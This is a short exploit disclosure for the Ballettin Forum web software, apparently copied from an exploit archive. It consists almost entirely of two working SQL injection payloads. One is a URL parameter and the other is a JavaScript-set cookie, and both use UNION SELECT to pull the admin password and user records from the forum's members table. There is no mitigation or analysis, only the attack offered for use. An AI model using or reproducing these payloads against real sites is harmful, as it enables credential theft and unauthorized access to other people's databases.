17 lines
No EOL
858 B
Text
17 lines
No EOL
858 B
Text
====================================================================
|
|
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
|
|
# Date: 25/07/2010
|
|
# Author: 3v0 aka evolution <evolution ^ darkedition.com>
|
|
# Software Link: http://www.ballettin.com
|
|
# Tested on: Windows Xp Pack 3
|
|
====================================================================
|
|
#1 - Vulnerable File
|
|
------------------------------------------------------
|
|
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]
|
|
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
|
|
|
|
#2 - Insecure Cookie
|
|
------------------------------------------------------
|
|
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
|
|
After go to http://www.site.com/ust.php
|
|
==================================================================== |